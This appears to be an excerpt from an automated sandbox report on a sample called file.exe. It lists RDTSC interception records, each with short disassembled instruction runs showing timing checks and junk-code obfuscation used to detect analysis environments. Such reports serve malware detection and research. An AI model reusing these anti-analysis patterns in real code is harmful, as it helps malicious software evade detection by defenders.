                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E17B second address: 105E180 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10600E1 second address: 10600E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060F62 second address: 1060FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 ja 00007F05C12920B6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edi 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F05C12920B8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 call 00007F05C12920BCh 0x00000035 jmp 00007F05C12920C5h 0x0000003a pop ebx 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e mov bx, cx 0x00000041 pop edi 0x00000042 xchg eax, esi 0x00000043 jbe 00007F05C12920C4h 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c pop esi 0x0000004d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060FD0 second address: 1060FF0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05C1502116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05C1502123h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060FF0 second address: 1060FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106027E second address: 1060333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+124649EDh], ecx 0x00000013 mov edi, dword ptr [ebp+122D1940h] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 stc 0x00000021 pushad 0x00000022 mov ecx, 62162A22h 0x00000027 mov esi, dword ptr [ebp+122D1FF6h] 0x0000002d popad 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F05C1502118h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f mov bx, ax 0x00000052 mov eax, dword ptr [ebp+122D129Dh] 0x00000058 jmp 00007F05C1502121h 0x0000005d push FFFFFFFFh 0x0000005f push 00000000h 0x00000061 push ebx 0x00000062 call 00007F05C1502118h 0x00000067 pop ebx 0x00000068 mov dword ptr [esp+04h], ebx 0x0000006c add dword ptr [esp+04h], 00000015h 0x00000074 inc ebx 0x00000075 push ebx 0x00000076 ret 0x00000077 pop ebx 0x00000078 ret 0x00000079 jmp 00007F05C1502124h 0x0000007e push eax 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060333 second address: 1060337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061ED7 second address: 1061F56 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05C1502118h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F05C1502118h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1246C702h], edi 0x0000002d mov dword ptr [ebp+122DBA9Bh], ecx 0x00000033 push 00000000h 0x00000035 mov edi, ecx 0x00000037 push 00000000h 0x00000039 call 00007F05C150211Ah 0x0000003e jg 00007F05C1502120h 0x00000044 pop ebx 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push edx 0x00000048 jmp 00007F05C150211Dh 0x0000004d pop edx 0x0000004e jnc 00007F05C1502118h 0x00000054 popad 0x00000055 push eax 0x00000056 jl 00007F05C150213Bh 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061F56 second address: 1061F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1062F1D second address: 1062F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10620CF second address: 10620D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1062F35 second address: 1062F3F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05C150211Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064020 second address: 106402A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F05C12920B6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106402A second address: 10640B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F05C1502118h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 jmp 00007F05C1502127h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F05C1502118h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 push 00000000h 0x00000049 ja 00007F05C150211Ch 0x0000004f xchg eax, esi 0x00000050 push ebx 0x00000051 js 00007F05C150211Ch 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106315A second address: 106315F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106315F second address: 106316C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106316C second address: 1063170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063170 second address: 1063174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066572 second address: 1066578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066578 second address: 106657C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069567 second address: 106957E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F05C12920BAh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106763A second address: 106763E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D1F4 second address: 106D1FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D1FE second address: 106D202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069D65 second address: 1069D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073B58 second address: 1073B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F05C150211Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107903F second address: 1079045 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10810C1 second address: 10810D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502120h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108027A second address: 1080294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F05C12920B8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F05C12920B6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080294 second address: 108029A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080560 second address: 108057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F05C12920C6h 0x0000000e jmp 00007F05C12920BAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108057A second address: 108057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108057E second address: 1080593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F05C12920B6h 0x00000009 jc 00007F05C12920B6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108076B second address: 108076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108076F second address: 10807AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05C12920B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F05C12920C7h 0x0000000f pushad 0x00000010 jno 00007F05C12920B6h 0x00000016 jmp 00007F05C12920C5h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10808D4 second address: 10808DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10808DA second address: 10808E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10808E0 second address: 10808E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080A74 second address: 1080A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080A7A second address: 1080A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007F05C1502129h 0x0000000f pop edi 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080C11 second address: 1080C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F05C12920B6h 0x0000000a popad 0x0000000b push ebx 0x0000000c jg 00007F05C12920C3h 0x00000012 jmp 00007F05C12920BBh 0x00000017 push esi 0x00000018 pop esi 0x00000019 jne 00007F05C12920BCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080D9B second address: 1080DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080DA3 second address: 1080DD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F05C12920C9h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F05C12920B6h 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080DD0 second address: 1080DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080DD4 second address: 1080DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F05C12920BFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080DEE second address: 1080DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080DF3 second address: 1080DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080F55 second address: 1080F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080F59 second address: 1080F7C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F05C12920B6h 0x00000011 jmp 00007F05C12920C2h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080F7C second address: 1080F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080F82 second address: 1080F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002275 second address: 1002279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002279 second address: 100227F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086019 second address: 108601E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108601E second address: 108603A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05C12920C3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108603A second address: 1086040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108630B second address: 1086311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10865EE second address: 10865F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10865F4 second address: 10865F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10865F8 second address: 10865FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085CD1 second address: 1085D20 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05C12920B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F05C12920D0h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 jmp 00007F05C12920C5h 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d ja 00007F05C12920C2h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B973 second address: 108B979 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054D5E second address: 1054D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054D62 second address: 1054DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F05C1502118h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D247Dh] 0x0000002a lea eax, dword ptr [ebp+12489B86h] 0x00000030 mov di, si 0x00000033 nop 0x00000034 ja 00007F05C150211Eh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jmp 00007F05C150211Eh 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054DBC second address: 1054DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054DC1 second address: 1031B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05C150211Dh 0x00000008 jmp 00007F05C1502129h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov edx, esi 0x00000013 call dword ptr [ebp+122D1E11h] 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054EAC second address: 1054EB6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054EB6 second address: 1054EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054EBA second address: 1054EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10552D6 second address: 10552DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10553C7 second address: 10553F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007F05C12920BDh 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05C12920C8h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055585 second address: 105558A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105558A second address: 1055590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105587E second address: 1055882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055882 second address: 1055898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F05C12920BEh 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055898 second address: 10558AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jl 00007F05C1502116h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10558AA second address: 10558B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10558B3 second address: 10558F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov edx, eax 0x0000000d push 00000004h 0x0000000f push eax 0x00000010 pop edx 0x00000011 sbb cl, FFFFFFEAh 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F05C1502120h 0x0000001d jmp 00007F05C1502125h 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055FD2 second address: 1056024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05C12920C0h 0x00000009 popad 0x0000000a nop 0x0000000b or dword ptr [ebp+1245F201h], edi 0x00000011 lea eax, dword ptr [ebp+12489BCAh] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F05C12920B8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 stc 0x00000032 jmp 00007F05C12920BCh 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push esi 0x0000003c pop esi 0x0000003d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108AAD5 second address: 108AAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F05C150211Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F05C1502116h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108AAF1 second address: 108AB01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108AD9F second address: 108ADBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05C150211Eh 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jp 00007F05C1502116h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E6BA second address: 108E6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C12920BBh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10929E3 second address: 10929E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092DB6 second address: 1092DBC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
